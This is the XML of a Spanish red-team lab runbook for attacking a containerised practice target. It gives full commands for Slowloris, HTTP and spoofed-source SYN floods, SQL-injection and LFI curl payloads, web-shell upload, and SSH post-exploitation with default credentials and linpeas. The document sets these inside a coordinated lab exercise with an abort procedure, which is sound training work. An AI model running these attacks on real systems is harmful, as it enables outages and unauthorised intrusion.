de /etc/passwd del target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lfi-url.txt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URL exacta que explotó LFI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upload-rce.txt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Confirmación de RCE con salidas de id y uname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shell-test.php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Webshell subida al servidor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9. Fase 6 — DoS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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>REQUISITO OBLIGATORIO: Coordinación previa con Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Antes de ejecutar cualquier vector, enviar al canal del equipo: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[RED TEAM — INICIO FASE 6]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Fase     : DoS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Hora     : HH:MM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Técnica  : Slowloris + HTTP flood + SYN flood secuenciales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Target   : 172.20.0.20 (puerto 80)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Duración : ~25 minutos incluyendo pausas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Señal OK : Confirmar cuando estén monitoreando con Wireshark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Esperar confirmación escrita del Blue Team antes de continuar.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Ejecutar — 3 terminales simultáneas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Terminal 1 (PowerShell en el HOST) — Captura de paquetes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cd C:\Project-Red-Team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bash observability/start-pcap.sh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Esto resuelve automáticamente el nombre del bridge de Docker (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>br-XXXXXXXXXXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) e inicia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. El archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> se guarda en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>evidence/pcap/capture-&lt;timestamp&gt;.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Para que el Blue Team abra el pcap en tiempo real con Wireshark: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Obtener el nombre del archivo pcap generado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cat /tmp/lab-pcap-file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Abrir en Wireshark (reemplazar con la ruta real)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wireshark evidence\pcap\capture-&lt;timestamp&gt;.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Terminal 2 (PowerShell) — Monitor de latencia en tiempo real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-it redteam-kali bash -c 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LAB_TARGET=172.20.0.20 bash /root/scripts/phase-6-dos/99-monitor.sh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"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Muestra una línea por segundo con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>timestamp | http_code | tiempo_respuesta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Durante el ataque se verá cómo el tiempo de respuesta aumenta o el código cambia a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (timeout).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Terminal 3 (PowerShell) — Orquestador de vectores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-it redteam-kali bash -c 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LAB_TARGET=172.20.0.20 PAUSE_BETWEEN_VECTORS=30 bash /root/scripts/phase-6-dos/run-dos-window.sh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"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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**Nota:** `PAUSE_BETWEEN_VECTORS=30` reduce la pausa entre vectores a 30 segundos para la demo. En producción real es 300 segundos (5 minutos) para permitir recuperación completa del servicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>El script pide confirmación interactiva antes de cada paso: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DoS WINDOW — Coordinated attack execution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Pre-flight checklist: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 ] Blue Team notificado y monitoreando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 ] Ventana acordada (hora inicio / hora fin)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 ] Canal de señal de abort establecido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 ] 99-monitor.sh corriendo en segunda terminal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Todo confirmado? Escribe YES para continuar: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Escribir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>YES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> y presionar Enter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Luego para cada vector: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Baseline capturado. Iniciar Vector 1 (Slowloris)? [y/N]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Escribir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> y presionar Enter.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Detalles de cada vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector 1 — Slowloris</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Abre 500 conexiones HTTP incompletas y las mantiene vivas enviando headers parciales cada 10 segundos. Agota el pool de workers del servidor Apache (150 conexiones máximo por defecto), impidiendo que usuarios legítimos se conecten.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slowhttptest -c 500 -H -i 10 -r 200 -t GET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-u http://172.20.0.20:80/ -x 24 -p 3 -l 60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-g -o slowloris-report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Duración:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60 segundos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Impacto esperado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache deja de responder a nuevas conexiones. El monitor mostrará </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (timeout) en los logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector 2 — HTTP Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Envía 50,000 requests HTTP GET con 1000 conexiones concurrentes usando Apache Bench. Satura el ancho de banda y la CPU del servidor.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ab -n 50000 -c 1000 -t 60 -r http://172.20.0.20:80/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Duración:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hasta 60 segundos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Impacto esperado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aumento masivo de requests por segundo, degradación del tiempo de respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector 3 — SYN Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Envía miles de paquetes SYN con IPs de origen aleatorias (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>--rand-source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). El servidor crea entradas en la tabla de conexiones semidefinidas (half-open) que nunca se completan, agotando los recursos del kernel.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hping3 -S --flood --rand-source -p 80 172.20.0.20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Duración:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30 segundos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Este es el vector más disruptivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — el servicio puede tardar más en recuperarse.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Señal de abort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Si el Blue Team envía la palabra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"ABORT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> al canal, presionar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> inmediatamente en el Terminal 3 para detener el vector activo.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Verificar recuperación del servicio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curl -s -o /dev/null -w '%{http_code} - %{time_total}s\n' http://172.20.0.20/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"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Resultado esperado cuando el servicio se recuperó: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200 - 0.012s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Detener la captura de paquetes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bash observability/stop-pcap.sh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Evidencia generada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baseline-curl.csv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Latencia baseline (30 muestras antes del ataque)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baseline-ab.txt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Métricas Apache Bench antes del ataque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slowloris-report.html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Reporte gráfico del Slowloris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slowloris.pcap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Captura de paquetes del vector 1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http-flood-ab.txt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Métricas del HTTP flood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http-flood.pcap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Captura de paquetes del vector 2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syn-flood.log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Log del SYN flood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syn-flood.pcap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Captura de paquetes del vector 3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monitor-HHMMSS.csv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Latencia durante el ataque (una línea por segundo)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evidence/pcap/capture-*.pcap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Captura global desde el host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10. Fase 7 — Post-explotación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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Con las credenciales </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>msfadmin:msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtenidas en Fase 4, ejecutar linpeas para buscar rutas de escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Prerequisito:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conectividad SSH confirmada (verificada en Fase 4).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Ejecutar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LAB_TARGET=172.20.0.20 SSH_USER=msfadmin SSH_PASS=msfadmin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bash /root/scripts/phase-7-post-exploitation/privesc-check.sh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"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Qué hace el script paso a paso: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Verifica conectividad SSH como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>msfadmin@172.20.0.20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Descarga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>linpeas.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> desde GitHub (requiere internet en el Kali)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Copia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>linpeas.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> al target via SCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ejecuta linpeas remotamente y guarda el output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Muestra hallazgos críticos (confianza ≥95%)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Conexión SSH manual para la demo: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-it redteam-kali bash -c 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sshpass -p msfadmin ssh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-o StrictHostKeyChecking=no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-o KexAlgorithms=+diffie-hellman-group1-sha1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-o 'MACs=+hmac-md5,hmac-sha1'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-o HostKeyAlgorithms=+ssh-rsa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msfadmin@172.20.0.20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"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Una vez dentro del target, ejecutar comandos de exploración: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id                          # uid=1000(msfadmin)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sudo -l                     # qué puede ejecutar como root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find / -perm -4000 2&gt;/dev/null | head -20   # binarios SUID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cat /etc/crontab            # tareas programadas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uname -a                    # versión del kernel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Evidencia generada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linpeas-output.txt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Output completo de linpeas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run.log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Hallazgos críticos filtrados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11. Ver evidencias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Toda la evidencia se guarda dentro del contenedor Kali en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/root/loot/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Ver estructura completa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find /root/loot -type f | sort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Ver evidencia de una fase específica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1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ls -lh /root/loot/phase-1-recon/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4 — credenciales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cat /root/loot/phase-4-credentials/&lt;timestamp&gt;/default-creds-results.txt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5 — LFI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cat /root/loot/phase-5-exploitation/&lt;timestamp&gt;/lfi-passwd.txt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5 — RCE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cat /root/loot/phase-5-exploitation/&lt;timestamp&gt;/upload-rce.txt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Reemplazar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;timestamp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el directorio listado (formato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>YYYYMMDD-HHMMSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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Copiar evidencia al host (para el informe)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Copiar todo el loot al host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cp redteam-kali:/root/loot C:\Project-Red-Team\evidence-export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Copiar solo una fase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cp redteam-kali:/root/loot/phase-5-exploitation C:\Project-Red-Team\evidence-export\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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12. Detener el entorno</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F3564"/>
        </w:pBdr>
        <w:spacing w:after="80"/>
      </w:pP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cd C:\Project-Red-Team\docker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compose down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Para detener y eliminar también los volúmenes (reset completo):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compose down -v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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13. Referencia rápida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Comandos de una sola línea para la demo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Levantar entorno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cd C:\Project-Red-Team\docker &amp;&amp; docker compose up -d --build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Smoke tests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/root/scripts/lib/test-common.sh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1 — Recon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/root/scripts/phase-1-recon/recon.sh"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2 — Scan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/root/scripts/phase-2-scanning/port-scan.sh"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3 — Enum HTTP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/root/scripts/phase-3-enumeration/enum-http.sh"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4 — Default creds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/root/scripts/phase-4-credentials/default-creds.sh"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5 — SQLi manual (demo rápida)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"curl -s -X POST 'http://172.20.0.20/mutillidae/index.php?page=login.php' -d 'username=admin%27+OR+%271%27%3D%271&amp;password=x&amp;login-php-submit-button=Login' | grep -i 'query\|logged'"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5 — LFI (demo rápida)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"curl -s 'http://172.20.0.20/mutillidae/index.php?page=../../../../etc/passwd' | grep -E '^[a-z_][a-z0-9_-]*:x:'"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5 — Web shells completo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bash /root/scripts/phase-5-exploitation/web-shells.sh"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6 — Monitor (Terminal 2)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-it redteam-kali bash -c "LAB_TARGET=172.20.0.20 bash /root/scripts/phase-6-dos/99-monitor.sh"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6 — DoS (Terminal 3, con pausa reducida para demo)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-it redteam-kali bash -c "LAB_TARGET=172.20.0.20 PAUSE_BETWEEN_VECTORS=30 bash /root/scripts/phase-6-dos/run-dos-window.sh"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7 — Post-explotación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docker exec redteam-kali bash -c "LAB_TARGET=172.20.0.20 SSH_USER=msfadmin SSH_PASS=msfadmin bash /root/scripts/phase-7-post-exploitation/privesc-check.sh"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Detener entorno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cd C:\Project-Red-Team\docker &amp;&amp; docker compose down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"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IPs y credenciales del laboratorio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IP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Usuario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Contraseña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Kali (atacante)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172.20.0.10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root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 (target)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DVWA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phpMyAdmin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root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(vacía)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Solución de problemas frecuentes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Causa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Solución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redteam-target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en Restarting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 tarda en iniciar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Esperar 60s, volver a ejecutar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>docker ps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ping: connect: Network unreachable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Stack no levantado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docker compose up -d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> desde </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>docker/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ssh: Connection refused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Servicio SSH no activo aún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Esperar 60s más y reintentar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curl: (7) Failed to connect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Target no alcanzable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Verificar que ambos contenedores están en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>lab-net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Permission denied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en start-pcap.sh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tcpdump requiere root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Ejecutar PowerShell como Administrador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Smoke test falla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Servicios aún iniciando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Esperar 2 min y repetir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